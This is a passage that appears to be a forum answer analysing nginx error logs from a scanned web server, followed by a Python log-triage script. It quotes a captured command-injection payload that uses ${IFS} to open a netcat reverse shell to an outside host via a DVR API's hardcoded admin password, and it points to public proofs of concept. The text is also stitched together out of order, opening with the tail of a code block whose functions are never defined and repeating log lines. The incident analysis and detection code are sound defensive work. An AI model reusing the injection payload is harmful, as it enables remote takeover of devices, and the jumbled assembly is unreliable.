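2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
'''

if __name__ == "__main__":
    for client, info in summarize(SAMPLE_LOG.splitlines()).items():
        print(client, info)
```

Every request in the sample ended in "forbidden" or "No such file or directory", which is the distinction that matters in triage: a probe that gets a 200 or reaches an application handler is the one to investigate.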
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
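Any server connected to the public Internet will be attacked to some extent, even if it is not vulnerable. Internet-wide vulnerability scans will find their way to you. The traffic indicates PHP scans and some other interesting traffic that has recently been showing up on my IPS:
Host 93.174.93[.]178 sent an HTTP POST request to the destination URL "editBlackAndWhiteList", using Base64-encoded credentials:
admin:{12213BD1-69C7-4862-843D-260500D1DA40}
XML payload: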
refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)
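IFS stands for "internal field separator". The shell uses it to determine how to do word splitting. The default value of IFS consists of whitespace characters (space, tab and newline). $IFS or ${IFS} is often used in command injection as a substitute for whitespace. For many command-line interpreters (the shells of Unix operating systems), the internal field separator is a variable that defines the characters used to separate a pattern into tokens for some operations.
$(nc 93.174.93[.]178 31337 -e $SHELL&) – Netcat reverse shell to host 93.174.93[.]178 on port 31337.
Fortinet has an IPS signature for this traffic, "HTTP.Unix.Shell.IFS.Remote.Code.Execution." It indicates detection of a suspicious HTTP request that uses the internal field separator.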
https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution
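Snort IPS flags this traffic under the signature "ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted."
The host is attempting to obtain a reverse shell by exploiting a remote code execution vulnerability in the Shenzhen TVT Digital Technology Co. Ltd and OEM {DVR/NVR/IPC} API via the hardcoded 'admin' Web GUI password. There are six PoCs on GitHub: https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
It would be wise to set up an IPS in front of your web server.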
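The triage the answer walks through, as an added example that is not part of the original answer: it parses nginx error-log lines in the format shown above, labels each client's probes, flags clients that request several missing paths in a burst, and detects the ${IFS} whitespace substitution in request data. The rule labels, the burst thresholds and the sample lines (documentation-range addresses) are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(r'^(?P<ts>\d{4}/\d\d/\d\d \d\d:\d\d:\d\d) \[error\] .*?client: (?P<client>[^,]+), '
                     r'server: [^,]+, request: "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# First match wins. Labels are this example's own names, not IPS signature names.
RULES = [
    ("dvr-api-post", lambda m, u: m == "POST" and u == "/editBlackAndWhiteList"),
    ("proxy-check", lambda m, u: u.startswith(("http://", "https://"))),
    ("wp-login", lambda m, u: u == "/wp-login.php"),
    ("adminer", lambda m, u: u == "/adminer.php"),
    ("php-scan", lambda m, u: u.endswith(".php")),
    ("root-fetch", lambda m, u: u == "/"),
]
IFS_RE = re.compile(r'\$(?:\{IFS\}|IFS\b)')  # $IFS or ${IFS} standing in for a space

def classify(method, uri):
    return next((label for label, rule in RULES if rule(method, uri)), "other")

def triage(lines, burst_paths=3, burst_seconds=10):
    """Per client: probe labels seen, and whether many distinct paths came in a burst."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:  # non-request lines (e.g. Passenger messages) are skipped
            continue
        ts = datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S")
        seen[m["client"]].append((ts, classify(m["method"], m["uri"]), m["uri"]))
    report = {}
    for client, hits in seen.items():
        probes = [(t, u) for t, label, u in hits if label != "root-fetch"]
        times = [t for t, _ in probes]
        span = (max(times) - min(times)).total_seconds() if times else 0
        report[client] = {"labels": sorted({label for _, label, _ in hits}),
                          "burst": len({u for _, u in probes}) >= burst_paths
                                   and span <= burst_seconds}
    return report

def has_ifs_substitution(text):
    return bool(IFS_RE.search(text))

def sample_line(t, client, req):  # constructed line in the format of the log above
    msg = ('directory index of "/ebs/www/" is forbidden' if req.endswith("/")
           else f'open() "/ebs/www{req.split()[1]}" failed (2: No such file or directory)')
    return (f'2019/10/02 {t} [error] 869#0: *1 {msg}, client: {client}, '
            f'server: 203.0.113.1, request: "{req} HTTP/1.1"')

SAMPLE = [sample_line(*row) for row in [
    ("15:38:08", "192.0.2.10", "GET /TP/public/index.php"), ("15:38:08", "192.0.2.10", "GET /elrekt.php"),
    ("15:38:09", "192.0.2.10", "GET /index.php"), ("15:38:11", "192.0.2.10", "GET /"),
    ("16:50:44", "198.51.100.7", "POST /editBlackAndWhiteList"), ("17:32:48", "203.0.113.50", "GET /"),
    ("17:53:00", "198.51.100.9", "HEAD http://192.0.2.99/"),
]] + ["[ E 2019-10-03 06:17:55.9323 ... ]: Security update check failed"]
```

Calling triage(SAMPLE) returns one entry per client. A client with only "root-fetch" is an ordinary crawler or port scanner, while "burst": True marks the rapid multi-path PHP sweep seen repeatedly in the log above.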